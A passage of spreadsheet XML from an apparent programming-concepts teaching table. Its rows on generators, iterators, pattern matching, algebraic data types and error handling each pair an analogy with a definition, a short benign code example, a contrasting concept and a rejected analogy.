      <c r="C359" t="inlineStr">
        <is>
          <t>Method chaining</t>
        </is>
      </c>
      <c r="D359" t="inlineStr">
        <is>
          <t>A charm bracelet assembled without ever being set down: each jeweler clips on one charm and hands the same bracelet to the next pair of hands.</t>
        </is>
      </c>
      <c r="E359" t="inlineStr">
        <is>
          <t>Each method returns an object (self or a new value) so calls string together in one fluent left-to-right expression.</t>
        </is>
      </c>
      <c r="F359" t="inlineStr">
        <is>
          <t>' Hello '.strip().lower().replace('l', 'r') / df.dropna().groupby('c').sum()</t>
        </is>
      </c>
      <c r="G359" t="inlineStr">
        <is>
          <t>Pipeline of free functions — same shape, but chaining requires the methods to live on the returned object.</t>
        </is>
      </c>
      <c r="H359" t="inlineStr">
        <is>
          <t>Daisy chain (rejected: generic for anything linked).</t>
        </is>
      </c>
      <c r="J359" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K359" t="inlineStr">
        <is>
          <t>Composition &amp; currying</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" t="n">
        <v>0</v>
      </c>
      <c r="B360" t="inlineStr">
        <is>
          <t>358</t>
        </is>
      </c>
      <c r="C360" t="inlineStr">
        <is>
          <t>Pipeline of small functions</t>
        </is>
      </c>
      <c r="D360" t="inlineStr">
        <is>
          <t>A mint's coin line under glass — blank, stamp, ridge, polish: visitors watch a coin be born and can point at exactly which station made a dent.</t>
        </is>
      </c>
      <c r="E360" t="inlineStr">
        <is>
          <t>Solve problems as a series of tiny named stages, each testable alone, so the top level reads like a recipe of verbs.</t>
        </is>
      </c>
      <c r="F360" t="inlineStr">
        <is>
          <t>clean = normalize(strip_html(load(path))) / tokens = tokenize(clean); index(tokens)</t>
        </is>
      </c>
      <c r="G360" t="inlineStr">
        <is>
          <t>God function — one 300-line body doing every stage inline, untestable in pieces.</t>
        </is>
      </c>
      <c r="H360" t="inlineStr">
        <is>
          <t>Bucket brigade (rejected: passes the same bucket unchanged).</t>
        </is>
      </c>
      <c r="J360" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K360" t="inlineStr">
        <is>
          <t>Composition &amp; currying</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" t="n">
        <v>0</v>
      </c>
      <c r="B361" t="inlineStr">
        <is>
          <t>359</t>
        </is>
      </c>
      <c r="C361" t="inlineStr">
        <is>
          <t>Identity function</t>
        </is>
      </c>
      <c r="D361" t="inlineStr">
        <is>
          <t>A revolving door standing alone in an open field: you walk in, spin once, and step out exactly where and who you were — installing it changes no journey.</t>
        </is>
      </c>
      <c r="E361" t="inlineStr">
        <is>
          <t>The function that returns its argument unchanged — the do-nothing unit of composition, a useful default and placeholder.</t>
        </is>
      </c>
      <c r="F361" t="inlineStr">
        <is>
          <t>identity = lambda x: x / sorted(nums, key=identity) # same as no key / compose(f, identity) == f</t>
        </is>
      </c>
      <c r="G361" t="inlineStr">
        <is>
          <t>No-op procedure — returns nothing and composes with nothing; identity returns its input so pipelines can thread it.</t>
        </is>
      </c>
      <c r="H361" t="inlineStr">
        <is>
          <t>Mirror (rejected: mirrors flip left-right — falsely lossy).</t>
        </is>
      </c>
      <c r="J361" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K361" t="inlineStr">
        <is>
          <t>Composition &amp; currying</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" t="n">
        <v>0</v>
      </c>
      <c r="B362" t="inlineStr">
        <is>
          <t>360</t>
        </is>
      </c>
      <c r="C362" t="inlineStr">
        <is>
          <t>Lazy evaluation</t>
        </is>
      </c>
      <c r="D362" t="inlineStr">
        <is>
          <t>A restaurant that cooks nothing until a fork is raised: its 'infinite menu' is possible because dish number 40,000 exists only as an unfired recipe card.</t>
        </is>
      </c>
      <c r="E362" t="inlineStr">
        <is>
          <t>Delay computing a value until it is actually needed, enabling infinite structures and skipping unused work; eager computes immediately.</t>
        </is>
      </c>
      <c r="F362" t="inlineStr">
        <is>
          <t>gen = (x*x for x in range(10**12)) # instant / next(gen) # only now does any work happen</t>
        </is>
      </c>
      <c r="G362" t="inlineStr">
        <is>
          <t>Async — about waiting on I/O without blocking; laziness is about deferring computation until demanded.</t>
        </is>
      </c>
      <c r="H362" t="inlineStr">
        <is>
          <t>Lazy teenager (rejected: character trait, no on-demand trigger).</t>
        </is>
      </c>
      <c r="J362" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K362" t="inlineStr">
        <is>
          <t>Laziness, iterators &amp; generators</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" t="n">
        <v>0</v>
      </c>
      <c r="B363" t="inlineStr">
        <is>
          <t>361</t>
        </is>
      </c>
      <c r="C363" t="inlineStr">
        <is>
          <t>Iterator protocol</t>
        </is>
      </c>
      <c r="D363" t="inlineStr">
        <is>
          <t>A Pez dispenser: thumb the head (next) and one candy clicks out; when it is empty the head snaps back with a hard STOP click.</t>
        </is>
      </c>
      <c r="E363" t="inlineStr">
        <is>
          <t>An iterator yields items one at a time via __next__ and raises StopIteration when done; for-loops speak this protocol under the hood.</t>
        </is>
      </c>
      <c r="F363" t="inlineStr">
        <is>
          <t>it = iter([1, 2]) / next(it); next(it) / next(it) # StopIteration</t>
        </is>
      </c>
      <c r="G363" t="inlineStr">
        <is>
          <t>Iterable — anything that can produce an iterator via __iter__; the iterator is the stateful cursor itself.</t>
        </is>
      </c>
      <c r="H363" t="inlineStr">
        <is>
          <t>Raffle ticket roll (rejected: no end-signal image).</t>
        </is>
      </c>
      <c r="J363" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K363" t="inlineStr">
        <is>
          <t>Laziness, iterators &amp; generators</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" t="n">
        <v>0</v>
      </c>
      <c r="B364" t="inlineStr">
        <is>
          <t>362</t>
        </is>
      </c>
      <c r="C364" t="inlineStr">
        <is>
          <t>Iterable vs iterator</t>
        </is>
      </c>
      <c r="D364" t="inlineStr">
        <is>
          <t>The iterable is the jukebox catalog; each coin mints a fresh playhead (iterator) that sweeps the records once and dies. The catalog never wears out.</t>
        </is>
      </c>
      <c r="E364" t="inlineStr">
        <is>
          <t>An iterable is a factory of iterators (list, str, dict); an iterator is a one-way cursor with position state and is its own iterable.</t>
        </is>
      </c>
      <c r="F364" t="inlineStr">
        <is>
          <t>lst = [1, 2, 3] # iterable: loop many times / it = iter(lst) # iterator: single pass / list(it), list(it) # [1, 2, 3], []</t>
        </is>
      </c>
      <c r="G364" t="inlineStr">
        <is>
          <t>Generator — one convenient way to make an iterator; iterable-vs-iterator is the general contract.</t>
        </is>
      </c>
      <c r="H364" t="inlineStr">
        <is>
          <t>Book vs bookmark (rejected: fine but overused in tutorials).</t>
        </is>
      </c>
      <c r="J364" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K364" t="inlineStr">
        <is>
          <t>Laziness, iterators &amp; generators</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" t="n">
        <v>0</v>
      </c>
      <c r="B365" t="inlineStr">
        <is>
          <t>363</t>
        </is>
      </c>
      <c r="C365" t="inlineStr">
        <is>
          <t>Generator function</t>
        </is>
      </c>
      <c r="D365" t="inlineStr">
        <is>
          <t>A bard who freezes mid-sentence the instant he hands you a verse — statue-still, wine glass raised — and thaws exactly there when you tap his shoulder for the next line.</t>
        </is>
      </c>
      <c r="E365" t="inlineStr">
        <is>
          <t>A function containing yield: calling it returns a generator, and each next() resumes the body until the next yield, pausing in place.</t>
        </is>
      </c>
      <c r="F365" t="inlineStr">
        <is>
          <t>def countdown(n): / while n: yield n; n -= 1 / list(countdown(3)) # [3, 2, 1]</t>
        </is>
      </c>
      <c r="G365" t="inlineStr">
        <is>
          <t>return — ends the function forever with one value; yield emits one value and suspends, keeping locals alive.</t>
        </is>
      </c>
      <c r="H365" t="inlineStr">
        <is>
          <t>Bread-slice dispenser (rejected: no suspended-state image).</t>
        </is>
      </c>
      <c r="J365" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K365" t="inlineStr">
        <is>
          <t>Laziness, iterators &amp; generators</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" t="n">
        <v>0</v>
      </c>
      <c r="B366" t="inlineStr">
        <is>
          <t>364</t>
        </is>
      </c>
      <c r="C366" t="inlineStr">
        <is>
          <t>Generator expression</t>
        </is>
      </c>
      <c r="D366" t="inlineStr">
        <is>
          <t>The list comprehension prints the entire phone book; the genexp is the same clerk who whispers you one number each time you lean in — the building never fills with paper.</t>
        </is>
      </c>
      <c r="E366" t="inlineStr">
        <is>
          <t>Comprehension syntax in parentheses producing a lazy generator instead of a list in memory: (f(x) for x in xs).</t>
        </is>
      </c>
      <c r="F366" t="inlineStr">
        <is>
          <t>sum(x*x for x in range(10**8)) # tiny memory / [x*x for x in range(10**8)] # gigabytes</t>
        </is>
      </c>
      <c r="G366" t="inlineStr">
        <is>
          <t>List comprehension — brackets, materializes everything now; a genexp computes items on demand, once.</t>
        </is>
      </c>
      <c r="H366" t="inlineStr">
        <is>
          <t>Vending machine vs warehouse (rejected: vending imagery reserved elsewhere).</t>
        </is>
      </c>
      <c r="J366" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K366" t="inlineStr">
        <is>
          <t>Laziness, iterators &amp; generators</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" t="n">
        <v>0</v>
      </c>
      <c r="B367" t="inlineStr">
        <is>
          <t>365</t>
        </is>
      </c>
      <c r="C367" t="inlineStr">
        <is>
          <t>Infinite sequences</t>
        </is>
      </c>
      <c r="D367" t="inlineStr">
        <is>
          <t>A scarf knitting itself off the needles forever; grandma just scissors off two meters when winter comes. The rest exists only as intention.</t>
        </is>
      </c>
      <c r="E367" t="inlineStr">
        <is>
          <t>Laziness lets you define endless streams — counters, cycles, primes — and take only what you need with islice or takewhile.</t>
        </is>
      </c>
      <c r="F367" t="inlineStr">
        <is>
          <t>from itertools import count, islice / evens = (n for n in count() if n % 2 == 0) / list(islice(evens, 5)) # [0, 2, 4, 6, 8]</t>
        </is>
      </c>
      <c r="G367" t="inlineStr">
        <is>
          <t>Infinite loop bug — spins without yielding control; an infinite generator politely pauses between items.</t>
        </is>
      </c>
      <c r="H367" t="inlineStr">
        <is>
          <t>Endless digits of pi (rejected: a constant, not a mechanism).</t>
        </is>
      </c>
      <c r="J367" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K367" t="inlineStr">
        <is>
          <t>Laziness, iterators &amp; generators</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" t="n">
        <v>0</v>
      </c>
      <c r="B368" t="inlineStr">
        <is>
          <t>366</t>
        </is>
      </c>
      <c r="C368" t="inlineStr">
        <is>
          <t>Generator pipeline</t>
        </is>
      </c>
      <c r="D368" t="inlineStr">
        <is>
          <t>An IV drip through three inline filters: one drop travels the entire line before the next drop leaves the bag — no bucket ever fills between stages.</t>
        </is>
      </c>
      <c r="E368" t="inlineStr">
        <is>
          <t>Chain generators so each item flows through every stage one at a time — constant-memory streaming over data of any size.</t>
        </is>
      </c>
      <c r="F368" t="inlineStr">
        <is>
          <t>lines = open('huge.log') / errs = (l for l in lines if 'ERROR' in l) / first = islice((l.upper() for l in errs), 10)</t>
        </is>
      </c>
      <c r="G368" t="inlineStr">
        <is>
          <t>Chained list map/filter — each stage builds a full list; generator stages hold one item at a time.</t>
        </is>
      </c>
      <c r="H368" t="inlineStr">
        <is>
          <t>Relay race (rejected: image already spent on positional arguments).</t>
        </is>
      </c>
      <c r="J368" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K368" t="inlineStr">
        <is>
          <t>Laziness, iterators &amp; generators</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" t="n">
        <v>0</v>
      </c>
      <c r="B369" t="inlineStr">
        <is>
          <t>367</t>
        </is>
      </c>
      <c r="C369" t="inlineStr">
        <is>
          <t>One-shot exhaustion</t>
        </is>
      </c>
      <c r="D369" t="inlineStr">
        <is>
          <t>A sparkler: dazzling as it burns down the wire, then a dead gray stick — wave it again and there is no error, just no light.</t>
        </is>
      </c>
      <c r="E369" t="inlineStr">
        <is>
          <t>An iterator or generator can be consumed only once; after the pass it stays empty, and re-looping silently yields nothing.</t>
        </is>
      </c>
      <c r="F369" t="inlineStr">
        <is>
          <t>g = (x for x in [1, 2, 3]) / sum(g) # 6 / sum(g) # 0 — silently empty!</t>
        </is>
      </c>
      <c r="G369" t="inlineStr">
        <is>
          <t>List re-iteration — lists restart fresh on every loop; a generator keeps its spent cursor forever.</t>
        </is>
      </c>
      <c r="H369" t="inlineStr">
        <is>
          <t>Used match (rejected: the sparkler's silent second wave IS the bug's face).</t>
        </is>
      </c>
      <c r="J369" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K369" t="inlineStr">
        <is>
          <t>Laziness, iterators &amp; generators</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" t="n">
        <v>0</v>
      </c>
      <c r="B370" t="inlineStr">
        <is>
          <t>368</t>
        </is>
      </c>
      <c r="C370" t="inlineStr">
        <is>
          <t>itertools toolbox</t>
        </is>
      </c>
      <c r="D370" t="inlineStr">
        <is>
          <t>A plumber's belt of odd brass fittings: one splices two streams into one (chain), one cuts a viewing window (islice), one loops a hose back into itself (cycle).</t>
        </is>
      </c>
      <c r="E370" t="inlineStr">
        <is>
          <t>Python's standard kit of lazy iterator combinators — count, cycle, chain, islice, takewhile, groupby — for composing streams.</t>
        </is>
      </c>
      <c r="F370" t="inlineStr">
        <is>
          <t>from itertools import chain, islice, cycle / list(islice(cycle('AB'), 5)) # A B A B A / list(chain([1, 2], [3])) # [1, 2, 3]</t>
        </is>
      </c>
      <c r="G370" t="inlineStr">
        <is>
          <t>functools — tools acting on functions (partial, reduce, lru_cache); itertools acts on iterators.</t>
        </is>
      </c>
      <c r="H370" t="inlineStr">
        <is>
          <t>Swiss Army knife (rejected: reserved for the 309 anti-pattern).</t>
        </is>
      </c>
      <c r="J370" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K370" t="inlineStr">
        <is>
          <t>Laziness, iterators &amp; generators</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" t="n">
        <v>0</v>
      </c>
      <c r="B371" t="inlineStr">
        <is>
          <t>369</t>
        </is>
      </c>
      <c r="C371" t="inlineStr">
        <is>
          <t>Thunk</t>
        </is>
      </c>
      <c r="D371" t="inlineStr">
        <is>
          <t>A mousetrap holding a computation: nothing whatsoever happens until you poke it and it goes THUNK — then, and only then, the cheese math springs.</t>
        </is>
      </c>
      <c r="E371" t="inlineStr">
        <is>
          <t>A zero-argument function wrapping an expression to delay its evaluation; calling the thunk forces the value — laziness by hand.</t>
        </is>
      </c>
      <c r="F371" t="inlineStr">
        <is>
          <t>thunk = lambda: expensive(42) / # ...later, only if needed: / value = thunk()</t>
        </is>
      </c>
      <c r="G371" t="inlineStr">
        <is>
          <t>Promise/Future — represents work already started elsewhere; a thunk starts no work until called.</t>
        </is>
      </c>
      <c r="H371" t="inlineStr">
        <is>
          <t>Joke past tense of think — 'it has already been thunk' (rejected: memorable but mechanism-free).</t>
        </is>
      </c>
      <c r="J371" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K371" t="inlineStr">
        <is>
          <t>Laziness, iterators &amp; generators</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" t="n">
        <v>0</v>
      </c>
      <c r="B372" t="inlineStr">
        <is>
          <t>370</t>
        </is>
      </c>
      <c r="C372" t="inlineStr">
        <is>
          <t>Algebraic data type</t>
        </is>
      </c>
      <c r="D372" t="inlineStr">
        <is>
          <t>Algebra class taught with food: a combo meal is pizza AND soda (product); the daily special is pizza OR pasta OR soup (sum). Menus are algebra.</t>
        </is>
      </c>
      <c r="E372" t="inlineStr">
        <is>
          <t>A type built by combining others two ways: AND (product: this field and that) or OR (sum: this variant or that).</t>
        </is>
      </c>
      <c r="F372" t="inlineStr">
        <is>
          <t>type Shape = Circle(r) | Rect(w, h) # a sum of products</t>
        </is>
      </c>
      <c r="G372" t="inlineStr">
        <is>
          <t>Abstract data type (also ADT) — an interface hiding implementation; algebraic types are about value shape.</t>
        </is>
      </c>
      <c r="H372" t="inlineStr">
        <is>
          <t>Chemistry compounds (rejected: bonds do not split into AND/OR cleanly).</t>
        </is>
      </c>
      <c r="J372" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K372" t="inlineStr">
        <is>
          <t>Pattern matching &amp; ADTs</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" t="n">
        <v>0</v>
      </c>
      <c r="B373" t="inlineStr">
        <is>
          <t>371</t>
        </is>
      </c>
      <c r="C373" t="inlineStr">
        <is>
          <t>Product type</t>
        </is>
      </c>
      <c r="D373" t="inlineStr">
        <is>
          <t>A bento box with every compartment filled at once — rice AND fish AND pickles. The menu multiplies: 3 rices times 4 fishes is 12 possible boxes.</t>
        </is>
      </c>
      <c r="E373" t="inlineStr">
        <is>
          <t>A type whose values hold one of each field simultaneously — tuples, records, structs; its value count is the product of field counts.</t>
        </is>
      </c>
      <c r="F373" t="inlineStr">
        <is>
          <t>Point = namedtuple('Point', 'x y') / p = Point(3, 4) # has both fields, always</t>
        </is>
      </c>
      <c r="G373" t="inlineStr">
        <is>
          <t>Sum type — holds exactly one variant at a time; a product holds all fields at once.</t>
        </is>
      </c>
      <c r="H373" t="inlineStr">
        <is>
          <t>Supermarket product barcode (rejected: 'product' pun, no multiplication).</t>
        </is>
      </c>
      <c r="J373" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K373" t="inlineStr">
        <is>
          <t>Pattern matching &amp; ADTs</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" t="n">
        <v>0</v>
      </c>
      <c r="B374" t="inlineStr">
        <is>
          <t>372</t>
        </is>
      </c>
      <c r="C374" t="inlineStr">
        <is>
          <t>Sum type</t>
        </is>
      </c>
      <c r="D374" t="inlineStr">
        <is>
          <t>A railroad switch: the train sits on exactly one track at any moment, and the big lever's tag tells you which — never straddling two rails.</t>
        </is>
      </c>
      <c r="E374" t="inlineStr">
        <is>
          <t>A type whose value is exactly one of several tagged variants — enums with payloads, tagged unions; value count is the sum of the variants'.</t>
        </is>
      </c>
      <c r="F374" t="inlineStr">
        <is>
          <t>enum Shape { Circle(f64), Square(f64) } // Rust / let s = Shape::Circle(2.0);</t>
        </is>
      </c>
      <c r="G374" t="inlineStr">
        <is>
          <t>Untagged C union — the same memory trick without the tag, so you cannot safely ask which variant is live.</t>
        </is>
      </c>
      <c r="H374" t="inlineStr">
        <is>
          <t>Coin heads-or-tails (rejected: only two untagged variants, no payload).</t>
        </is>
      </c>
      <c r="J374" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K374" t="inlineStr">
        <is>
          <t>Pattern matching &amp; ADTs</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" t="n">
        <v>0</v>
      </c>
      <c r="B375" t="inlineStr">
        <is>
          <t>373</t>
        </is>
      </c>
      <c r="C375" t="inlineStr">
        <is>
          <t>Destructuring</t>
        </is>
      </c>
      <c r="D375" t="inlineStr">
        <is>
          <t>A chocolate orange: one sharp twist and it falls apart into labeled segments that land in your named, cupped fingers.</t>
        </is>
      </c>
      <c r="E375" t="inlineStr">
        <is>
          <t>Binding names to pieces of a structure in one pattern-shaped assignment — unpacking tuples, dicts, or objects by their shape.</t>
        </is>
      </c>
      <c r="F375" t="inlineStr">
        <is>
          <t>x, y = (3, 4) / first, *rest = [1, 2, 3, 4] / const {id, ...extra} = row; // JS</t>
        </is>
      </c>
      <c r="G375" t="inlineStr">
        <is>
          <t>Pattern matching — destructuring plus conditional dispatch; destructuring alone assumes the shape fits.</t>
        </is>
      </c>
      <c r="H375" t="inlineStr">
        <is>
          <t>Unpacking moving boxes (rejected: matches the word, not shape-driven binding).</t>
        </is>
      </c>
      <c r="J375" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K375" t="inlineStr">
        <is>
          <t>Pattern matching &amp; ADTs</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" t="n">
        <v>0</v>
      </c>
      <c r="B376" t="inlineStr">
        <is>
          <t>374</t>
        </is>
      </c>
      <c r="C376" t="inlineStr">
        <is>
          <t>Match expression</t>
        </is>
      </c>
      <c r="D376" t="inlineStr">
        <is>
          <t>A coin sorter with shaped slots: each falling value tumbles past star, square, and circle holes and drops through the first hole shaped like itself, into that arm's bucket.</t>
        </is>
      </c>
      <c r="E376" t="inlineStr">
        <is>
          <t>A control structure that tests a value against shape patterns, binds their pieces, and runs the first matching arm.</t>
        </is>
      </c>
      <c r="F376" t="inlineStr">
        <is>
          <t>match cmd: / case ('move', x, y): go(x, y) / case ('quit',): bye()</t>
        </is>
      </c>
      <c r="G376" t="inlineStr">
        <is>
          <t>switch/case — compares equality against constants; match tests nested structure and binds variables.</t>
        </is>
      </c>
      <c r="H376" t="inlineStr">
        <is>
          <t>Striking a match down a matchbook of patterns (rejected: fire adds nothing to binding).</t>
        </is>
      </c>
      <c r="J376" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K376" t="inlineStr">
        <is>
          <t>Pattern matching &amp; ADTs</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" t="n">
        <v>0</v>
      </c>
      <c r="B377" t="inlineStr">
        <is>
          <t>375</t>
        </is>
      </c>
      <c r="C377" t="inlineStr">
        <is>
          <t>Pattern guards</t>
        </is>
      </c>
      <c r="D377" t="inlineStr">
        <is>
          <t>The nightclub bouncer checks your outfit (pattern) AND scans your ID under UV light (guard); dressed right with a fake ID, you fall through to the next bouncer down the line.</t>
        </is>
      </c>
      <c r="E377" t="inlineStr">
        <is>
          <t>An extra boolean condition on a match arm — case pattern if test — so the arm needs both the shape and a truth to fire.</t>
        </is>
      </c>
      <c r="F377" t="inlineStr">
        <is>
          <t>match point: / case (x, y) if x == y: print('diagonal') / case (x, y): print('off-diagonal')</t>
        </is>
      </c>
      <c r="G377" t="inlineStr">
        <is>
          <t>Nested if inside the arm — runs after committing to the arm; a failed guard falls through to later arms.</t>
        </is>
      </c>
      <c r="H377" t="inlineStr">
        <is>
          <t>Guard dog beside a stencil gate (rejected: one bouncer doing two checks is clearer).</t>
        </is>
      </c>
      <c r="J377" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K377" t="inlineStr">
        <is>
          <t>Pattern matching &amp; ADTs</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" t="n">
        <v>0</v>
      </c>
      <c r="B378" t="inlineStr">
        <is>
          <t>376</t>
        </is>
      </c>
      <c r="C378" t="inlineStr">
        <is>
          <t>Wildcard pattern</t>
        </is>
      </c>
      <c r="D378" t="inlineStr">
        <is>
          <t>A joker card at the bottom of the deck that impersonates any card slapped onto it, but has amnesia — it never remembers what it matched.</t>
        </is>
      </c>
      <c r="E378" t="inlineStr">
        <is>
          <t>The catch-all pattern (_ in most languages) that matches anything without binding a name — the match's final safety net.</t>
        </is>
      </c>
      <c r="F378" t="inlineStr">
        <is>
          <t>match code: / case 200: ok() / case _: raise Unknown(code)</t>
        </is>
      </c>
      <c r="G378" t="inlineStr">
        <is>
          <t>Named catch-all (case x) — also matches everything but binds the value; _ deliberately discards it.</t>
        </is>
      </c>
      <c r="H378" t="inlineStr">
        <is>
          <t>Wild West poster reading 'WANTED: ANYONE' (rejected: pun stretch).</t>
        </is>
      </c>
      <c r="J378" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K378" t="inlineStr">
        <is>
          <t>Pattern matching &amp; ADTs</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" t="n">
        <v>0</v>
      </c>
      <c r="B379" t="inlineStr">
        <is>
          <t>377</t>
        </is>
      </c>
      <c r="C379" t="inlineStr">
        <is>
          <t>Exhaustiveness checking</t>
        </is>
      </c>
      <c r="D379" t="inlineStr">
        <is>
          <t>A pre-flight clipboard that refuses takeoff until every seat is ticked; bolt a new row onto the plane and every old clipboard in the fleet starts flashing red.</t>
        </is>
      </c>
      <c r="E379" t="inlineStr">
        <is>
          <t>The compiler proves your match handles every variant of a sum type, so each newly added variant turns unfixed matches into errors.</t>
        </is>
      </c>
      <c r="F379" t="inlineStr">
        <is>
          <t>// Rust / match light { Red =&gt; stop(), Green =&gt; go() } / // error: non-exhaustive — Yellow not covered</t>
        </is>
      </c>
      <c r="G379" t="inlineStr">
        <is>
          <t>Default arm — silences the checker forever; exhaustiveness is compile-time proof precisely because there is no default.</t>
        </is>
      </c>
      <c r="H379" t="inlineStr">
        <is>
          <t>Exhaust-pipe emissions test (rejected: sound-alike with zero semantics).</t>
        </is>
      </c>
      <c r="J379" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K379" t="inlineStr">
        <is>
          <t>Pattern matching &amp; ADTs</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" t="n">
        <v>0</v>
      </c>
      <c r="B380" t="inlineStr">
        <is>
          <t>378</t>
        </is>
      </c>
      <c r="C380" t="inlineStr">
        <is>
          <t>Make illegal states unrepresentable</t>
        </is>
      </c>
      <c r="D380" t="inlineStr">
        <is>
          <t>A one-way turnstile forged so its gears physically cannot spin backwards: no 'do not enter' sign needed — the wrong motion does not exist in the machine.</t>
        </is>
      </c>
      <c r="E380" t="inlineStr">
        <is>
          <t>Design types so invalid combinations simply cannot be constructed — the type system, not runtime checks, excludes nonsense.</t>
        </is>
      </c>
      <c r="F380" t="inlineStr">
        <is>
          <t># bad: is_loading, data, error can conflict / # good: / State = Loading | Loaded(data) | Failed(err)</t>
        </is>
      </c>
      <c r="G380" t="inlineStr">
        <is>
          <t>Validation — rejects bad values at runtime borders; this removes the bad values from the type universe.</t>
        </is>
      </c>
      <c r="H380" t="inlineStr">
        <is>
          <t>Puzzle pieces that only fit one way (rejected: overused for any API design).</t>
        </is>
      </c>
      <c r="J380" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K380" t="inlineStr">
        <is>
          <t>Pattern matching &amp; ADTs</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" t="n">
        <v>0</v>
      </c>
      <c r="B381" t="inlineStr">
        <is>
          <t>379</t>
        </is>
      </c>
      <c r="C381" t="inlineStr">
        <is>
          <t>Newtype pattern</t>
        </is>
      </c>
      <c r="D381" t="inlineStr">
        <is>
          <t>Identical white pills repackaged into loudly labeled bottles — ASPIRIN vs RAT POISON: the pharmacist physically cannot pour one bottle against the other's prescription.</t>
        </is>
      </c>
      <c r="E381" t="inlineStr">
        <is>
          <t>Wrap a primitive in a distinct zero-cost type — UserId(int), Meters(float) — so the compiler stops you mixing semantically different values.</t>
        </is>
      </c>
      <c r="F381" t="inlineStr">
        <is>
          <t>struct Meters(f64); struct Feet(f64); / fn climb(h: Meters) { ... } / climb(Feet(3.0)) // compile error</t>
        </is>
      </c>
      <c r="G381" t="inlineStr">
        <is>
          <t>Type alias — just a nickname the compiler sees through; a newtype is a genuinely distinct type.</t>
        </is>
      </c>
      <c r="H381" t="inlineStr">
        <is>
          <t>Gift-wrapping money (rejected: wrapping implies overhead; newtypes are free).</t>
        </is>
      </c>
      <c r="J381" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K381" t="inlineStr">
        <is>
          <t>Pattern matching &amp; ADTs</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" t="n">
        <v>0</v>
      </c>
      <c r="B382" t="inlineStr">
        <is>
          <t>380</t>
        </is>
      </c>
      <c r="C382" t="inlineStr">
        <is>
          <t>Errors as values</t>
        </is>
      </c>
      <c r="D382" t="inlineStr">
        <is>
          <t>Instead of the kitchen shrieking a fire alarm through the whole restaurant, the waiter lays a small red card on your table: 'no fish today' — you must pick it up to see the plate beneath.</t>
        </is>
      </c>
      <c r="E382" t="inlineStr">
        <is>
          <t>Return failures as ordinary data the caller must handle, instead of throwing exceptions that teleport control up the stack.</t>
        </is>
      </c>
      <c r="F382" t="inlineStr">
        <is>
          <t>val, err := parse(s) // Go / if err != nil { return nil, err }</t>
        </is>
      </c>
      <c r="G382" t="inlineStr">
        <is>
          <t>Exceptions — nonlocal control flow invisible in signatures; error values appear right in the return type.</t>
        </is>
      </c>
      <c r="H382" t="inlineStr">
        <is>
          <t>Boomerang of blame (rejected: comic, mechanism-free).</t>
        </is>
      </c>
      <c r="J382" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K382" t="inlineStr">
        <is>
          <t>Functional error handling &amp; monads</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" t="n">
        <v>0</v>
      </c>
      <c r="B383" t="inlineStr">
        <is>
          <t>381</t>
        </is>
      </c>
      <c r="C383" t="inlineStr">
        <is>
          <t>Option / Maybe</t>
        </is>
      </c>
      <c r="D383" t="inlineStr">
        <is>
